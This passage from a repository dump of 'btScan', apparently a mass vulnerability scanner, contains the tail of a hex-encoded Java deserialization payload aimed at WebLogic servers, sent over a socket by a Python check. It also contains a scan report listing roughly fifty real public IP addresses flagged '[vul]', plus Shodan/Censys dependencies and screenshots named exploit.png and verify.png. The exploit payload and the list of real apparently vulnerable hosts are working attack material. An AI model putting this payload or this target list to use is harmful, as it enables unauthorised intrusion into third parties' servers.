e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
37 |         sock.send(payload)
38 |         msg = 'may vul, check access.log'
39 |         return False, host+':'+str(port), msg
40 |     except Exception, e:
41 |         msg = str(e)
42 |         return False, host+':'+str(port), msg
43 | 


--------------------------------------------------------------------------------
/node/weblogic_ser.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/weblogic_ser.pyc


--------------------------------------------------------------------------------
/report/btscan_20151226_000414.html:
--------------------------------------------------------------------------------
  1 | 
  2 | <html>
  3 | <head>
  4 | <title>BBScan Report</title>
  5 | <style>
  6 |     body {width:960px; margin:auto; margin-top:10px; background:rgb(200,200,200);}
  7 |     p {color: #666;}
  8 |     h2 {color:#002E8C; font-size: 1em; padding-top:5px;}
  9 | </style>
 10 | </head>
 11 | <body>
 12 | <h2 align="left"><font face="Verdana" size="5">
 13 | btscan v1.0 scan report
 14 | </font></h2>
 15 | <hr>
 16 | <br>
 17 | <ul>
 18 |     
 19 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://202.129.59.70:80/" target="_blank">http://202.129.59.70:80/</a> </li>
 20 | 
 21 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://114.35.124.154:80/" target="_blank">http://114.35.124.154:80/</a> </li>
 22 | 
 23 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://83.212.112.6:80/" target="_blank">http://83.212.112.6:80/</a> </li>
 24 | 
 25 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://186.177.17.226:80/" target="_blank">http://186.177.17.226:80/</a> </li>
 26 | 
 27 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://181.193.0.242:80/" target="_blank">http://181.193.0.242:80/</a> </li>
 28 | 
 29 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://212.183.203.54:80/" target="_blank">http://212.183.203.54:80/</a> </li>
 30 | 
 31 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://162.243.149.157:80/" target="_blank">http://162.243.149.157:80/</a> </li>
 32 | 
 33 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://81.247.204.7:80/" target="_blank">http://81.247.204.7:80/</a> </li>
 34 | 
 35 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://23.101.188.212:80/" target="_blank">http://23.101.188.212:80/</a> </li>
 36 | 
 37 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://78.47.167.118:80/" target="_blank">http://78.47.167.118:80/</a> </li>
 38 | 
 39 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://87.251.206.36:80/" target="_blank">http://87.251.206.36:80/</a> </li>
 40 | 
 41 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://192.3.169.85:80/" target="_blank">http://192.3.169.85:80/</a> </li>
 42 | 
 43 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://213.185.128.3:80/" target="_blank">http://213.185.128.3:80/</a> </li>
 44 | 
 45 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://213.188.152.23:80/" target="_blank">http://213.188.152.23:80/</a> </li>
 46 | 
 47 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://104.238.111.191:80/" target="_blank">http://104.238.111.191:80/</a> </li>
 48 | 
 49 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://217.126.158.108:80/" target="_blank">http://217.126.158.108:80/</a> </li>
 50 | 
 51 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://94.140.243.90:80/" target="_blank">http://94.140.243.90:80/</a> </li>
 52 | 
 53 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://54.148.30.182:80/" target="_blank">http://54.148.30.182:80/</a> </li>
 54 | 
 55 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://77.37.224.238:80/" target="_blank">http://77.37.224.238:80/</a> </li>
 56 | 
 57 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://121.156.118.240:80/" target="_blank">http://121.156.118.240:80/</a> </li>
 58 | 
 59 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://87.193.240.251:80/" target="_blank">http://87.193.240.251:80/</a> </li>
 60 | 
 61 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://88.159.158.79:80/" target="_blank">http://88.159.158.79:80/</a> </li>
 62 | 
 63 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://114.112.92.59:80/" target="_blank">http://114.112.92.59:80/</a> </li>
 64 | 
 65 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://54.148.30.182:80/" target="_blank">http://54.148.30.182:80/</a> </li>
 66 | 
 67 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://203.64.43.229:80/" target="_blank">http://203.64.43.229:80/</a> </li>
 68 | 
 69 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://59.126.142.220:80/" target="_blank">http://59.126.142.220:80/</a> </li>
 70 | 
 71 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://151.62.95.167:80/" target="_blank">http://151.62.95.167:80/</a> </li>
 72 | 
 73 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://208.55.217.198:80/" target="_blank">http://208.55.217.198:80/</a> </li>
 74 | 
 75 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://67.0.197.157:80/" target="_blank">http://67.0.197.157:80/</a> </li>
 76 | 
 77 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://54.75.233.46:80/" target="_blank">http://54.75.233.46:80/</a> </li>
 78 | 
 79 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://113.52.155.15:80/" target="_blank">http://113.52.155.15:80/</a> </li>
 80 | 
 81 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://141.105.121.62:80/" target="_blank">http://141.105.121.62:80/</a> </li>
 82 | 
 83 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://182.92.73.246:80/" target="_blank">http://182.92.73.246:80/</a> </li>
 84 | 
 85 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://188.125.120.69:80/" target="_blank">http://188.125.120.69:80/</a> </li>
 86 | 
 87 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://31.216.243.44:80/" target="_blank">http://31.216.243.44:80/</a> </li>
 88 | 
 89 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://84.253.188.213:80/" target="_blank">http://84.253.188.213:80/</a> </li>
 90 | 
 91 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://188.35.22.102:80/" target="_blank">http://188.35.22.102:80/</a> </li>
 92 | 
 93 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://91.224.23.24:80/" target="_blank">http://91.224.23.24:80/</a> </li>
 94 | 
 95 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://201.190.9.70:80/" target="_blank">http://201.190.9.70:80/</a> </li>
 96 | 
 97 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://195.46.22.250:80/" target="_blank">http://195.46.22.250:80/</a> </li>
 98 | 
 99 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://81.27.38.47:80/" target="_blank">http://81.27.38.47:80/</a> </li>
100 | 
101 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://80.252.153.19:80/" target="_blank">http://80.252.153.19:80/</a> </li>
102 | 
103 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://196.35.252.226:80/" target="_blank">http://196.35.252.226:80/</a> </li>
104 | 
105 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://130.211.254.246:80/" target="_blank">http://130.211.254.246:80/</a> </li>
106 | 
107 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://190.85.232.124:80/" target="_blank">http://190.85.232.124:80/</a> </li>
108 | 
109 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://212.204.195.142:80/" target="_blank">http://212.204.195.142:80/</a> </li>
110 | 
111 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://92.51.165.64:80/" target="_blank">http://92.51.165.64:80/</a> </li>
112 | 
113 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://80.87.193.40:80/" target="_blank">http://80.87.193.40:80/</a> </li>
114 | 
115 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://191.237.2.148:80/" target="_blank">http://191.237.2.148:80/</a> </li>
116 | 
117 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[vul]</font> <a href="http://212.185.27.196:80/" target="_blank">http://212.185.27.196:80/</a> </li>
118 | 
119 | <ul>
120 | </body>
121 | </html>
122 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | termcolor
2 | shodan
3 | censys
4 | pexpect
5 | 


--------------------------------------------------------------------------------
/screenshot/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/screenshot/exploit.png


--------------------------------------------------------------------------------
/screenshot/verify.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/screenshot/verify.png


--------------------------------------------------------------------------------